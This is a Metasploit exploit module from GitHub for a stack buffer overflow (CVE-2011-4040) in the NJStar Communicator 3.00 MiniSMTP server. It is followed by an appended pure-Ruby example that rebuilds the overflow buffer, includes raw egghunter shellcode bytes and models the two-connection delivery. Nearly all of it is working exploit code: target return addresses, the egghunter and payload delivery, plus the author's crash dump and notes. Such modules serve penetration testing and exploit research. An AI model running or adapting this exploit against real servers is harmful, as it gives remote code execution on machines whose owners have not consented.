GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smtp/njstar_smtp_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NJStar Communicator 3.00 MiniSMTP Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow vulnerability in NJStar Communicator
        Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple
        NJStar products, and will continue to run in the background even if the
        software has already been shut down. According to the vendor's testimonials,
        NJStar software is also used by well-known companies such as Siemens, NEC,
        Google, Yahoo, eBay; government agencies such as the FBI, Department of
        Justice (HK); as well as a long list of universities such as Yale, Harvard,
        University of Tokyo, etc.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Dillon Beresford', # Original discovery and MSF Module.
        ],
      'References'     =>
        [
          [ 'OSVDB', '76728' ],
          [ 'CVE', '2011-4040' ],
          [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
          [ 'EDB', '18057' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'StackAdjustment' => -1500,
        },
      'Targets'        =>
        [
          [
            'Windows XP SP2/SP3',
            {
              'Ret'    => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)
              'Offset' => 247,
            }
          ],
          [
            # Can't test patch level on this one, because you can't
            # even update Win2k3 SP0 anymore from Windows Update
            'Windows Server 2003 SP0',
            {
              'Ret'    => 0x77d20738, # JMP ESP (USER32.dll)
              'Offset' => 247,
            }
          ],
          [
            'Windows Server 2003 SP1/SP2',
            {
              'Ret'    => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)
              'Offset' => 247,
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-10-31',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(25)])
  end

  def check
    connect
    # We get a response like: "220 [host-name] Service Ready"
    # But we don't really care about this one
    res = sock.get_once(-1, 5)
    vprint_status("Banner: #{res.to_s.chop}")

    sock.puts("HELP\r\n")

    # But the HELP response will tell us if this is a NJStar SMTP or not
    res = sock.get_once(-1, 5)
    vprint_status("HELP Response: #{res.to_s.chop}")
    disconnect

    # I can only flag it as "Detected" because it doesn't return a version
    if res =~ /Windows E-mail Server From NJStar Software/i
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    eggoptions =
      {
        :checksum => true,
        :eggtag   => "w00t"
      }

    hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)

    # Filler up to the saved return address, the return address itself,
    # then the egg hunter that will find the payload sent on the other connection.
    buffer = rand_text(target['Offset'])
    buffer << [target.ret].pack('V')
    buffer << hunter
    buffer << make_nops(4)

    # Just some debugging output so we can see the length and bytes of each of our buffers.
    vprint_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
    vprint_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
    vprint_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))

    print_status("Trying target #{target.name}...")

    # har har har you get trick no treat...
    # we don't have very much space so we
    # send our egg in a separate connection
    connect

    print_status("Sending the egg...")
    sock.put(egg)

    # I think you betta call, ghostbusters...
    # now we send our evil buffer along with the
    # egg hunter, we are doing multiple connections
    # to solve the issue with limited stack space.
    # thanks to bannedit for advice on threads and
    # making multiple connections to get around
    # stack space constraints. :)
    connect

    print_status("Sending our buffer containing the egg hunter...")
    sock.put(buffer)

    handler
    disconnect
  end
end

=begin
Dillon Beresford
https://twitter.com/#!/D1N

NJStar Communicator
Version: 3.00 and prior
Build: 11818 and prior

Tested minismtp version:
1.30.0.60218

Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
manils, d0tslash, mublix, halsten, and everyone at AHA!

No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
on 10/30/11 and 10/31/11; CNCERT said in an email they needed to see if the vulnerability
is remotely exploitable and needed more verification. I sent a proof of concept exploit
in python with remote code execution. So, here is the proof that the bug is, in fact,
remotely exploitable. WIN!

System DLLs are used for target.ret because minismtp.exe is the only NJStar component in
memory, and its base starts with 0x00, which is no good. However, if your target machine
started minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator
-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is
ideal enough to use (no rebase, starts with a high address, but there is an ASLR flag).

eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
edi=008a3d80
eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
42424242 ?? ???
0:003> !exchain
image00400000+bbc4 (0040bbc4)
00ccff00: 41414141
Invalid exception stack at 41414141
0:003> d esp
00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.
00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..
00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......
00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................
00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........

=end
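Added example (not part of the module above and not Metasploit code): a pure-Ruby model of the two things the exploit method and the trailing note rely on, runnable without the framework. It builds the same buffer layout (247 bytes of filler, a little-endian return address, the hunter, 4 NOPs), shows why a return address inside minismtp.exe (image base 0x00400000) fails the "\x00" bad-char check while the 0x77xxxxxx system-DLL addresses from the target table pass, and then simulates the two-connection delivery: the egg lands in one buffer, the overflow in another, and a model of the hunter scans memory for the doubled tag. The hunter bytes are the classic 32-byte Skape NtAccessCheckAndAuditAlarm egghunter (the no-checksum variant); the egg framing used here (tag twice, payload, one trailing byte-sum checksum) and the function names skape_hunter, build_egg, build_overflow, hunt_egg and demo are this example's own assumptions, not the exact encoding generate_egghunter produces with :checksum => true. The payload bytes and the "process memory" string are constructed for the demo.

```ruby
# Added example; mirrors the module's layout but is not the module's code.
BADCHARS = "\x00".b          # the module's 'BadChars'
OFFSET   = 247               # the module's 'Offset' for every target
EGGTAG   = "w00t".b          # the module's :eggtag
NOP      = "\x90".b

TARGET_RETS = {
  'Windows XP SP2/SP3'          => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)
  'Windows Server 2003 SP0'     => 0x77d20738, # JMP ESP (USER32.dll)
  'Windows Server 2003 SP1/SP2' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)
}.freeze

# Classic 32-byte Skape egghunter (syscall 2, NtAccessCheckAndAuditAlarm) for a
# 4-byte tag. It contains the tag only once (mov eax, tag), so it never matches
# itself; the egg carries the tag twice, which is what the hunter looks for.
def skape_hunter(tag = EGGTAG)
  raise ArgumentError, 'tag must be 4 bytes' unless tag.bytesize == 4
  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8".b +
    tag + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7".b
end

# Bad characters present in a byte string (unique, in order of appearance).
def badchars_in(bytes, badchars = BADCHARS)
  bytes.b.each_char.select { |c| badchars.include?(c) }.uniq
end

# A return address is only usable if its little-endian encoding has no bad chars.
# 0x0040xxxx (minismtp.exe) encodes with a trailing 0x00; the 0x77xxxxxx DLL
# addresses do not. This is the reason the note gives for using system DLLs.
def usable_ret?(addr, badchars = BADCHARS)
  badchars_in([addr].pack('V'), badchars).empty?
end

# Egg = tag twice + payload + one byte-sum checksum (assumed scheme, see lead-in).
def build_egg(payload, tag = EGGTAG)
  tag * 2 + payload.b + (payload.b.each_byte.sum & 0xff).chr
end

# Same layout as the module: filler to the saved return, ret, hunter, 4 NOPs.
def build_overflow(ret, hunter, offset = OFFSET, filler: 'A')
  (filler.b * offset) + [ret].pack('V') + hunter.b + NOP * 4
end

# Model of what the hunter does once EIP lands on it: walk memory for the
# doubled tag, verify the (assumed) checksum over the expected payload length,
# and return the payload that follows the tag. A corrupted or truncated copy of
# the egg fails the checksum and the scan continues.
def hunt_egg(memory, payload_len, tag = EGGTAG)
  needle = tag * 2
  pos = 0
  while (idx = memory.index(needle, pos))
    start     = idx + needle.bytesize
    candidate = memory.byteslice(start, payload_len)
    chk       = memory.getbyte(start + payload_len)
    if candidate && chk && (candidate.each_byte.sum & 0xff) == chk
      return candidate
    end
    pos = idx + 1
  end
  nil
end

def demo
  payload = "\xcc".b * 40   # constructed stand-in for payload.encoded
  egg     = build_egg(payload)
  buf     = build_overflow(TARGET_RETS['Windows XP SP2/SP3'], skape_hunter)

  # Constructed process memory: a truncated leftover copy of the egg first
  # (rejected by the checksum), then connection 1's complete egg, then
  # connection 2's overflow buffer holding the hunter.
  memory = ("\x00".b * 32) + egg.byteslice(0, 20) + ("\x00".b * 32) + egg +
           ("\x00".b * 64) + buf + ("\x00".b * 16)

  {
    egg_bytes:    egg.bytesize,
    buffer_bytes: buf.bytesize,
    found:        hunt_egg(memory, payload.bytesize) == payload,
    dll_rets_ok:  TARGET_RETS.values.all? { |r| usable_ret?(r) },
    image_ret_ok: usable_ret?(0x0040bbc4), # the image00400000+bbc4 frame from the dump
  }
end

p demo if __FILE__ == $PROGRAM_NAME
```

Building the buffer with filler 'A', ret 0x42424242 and a hunter of 'D' bytes reproduces the crash dump at the end of the note: 'BBBB' sits exactly at offset 247 (EIP=42424242) and the bytes at ESP are the 'D's that follow it, which is why a PUSH ESP; RETN or JMP ESP gadget lands on the hunter.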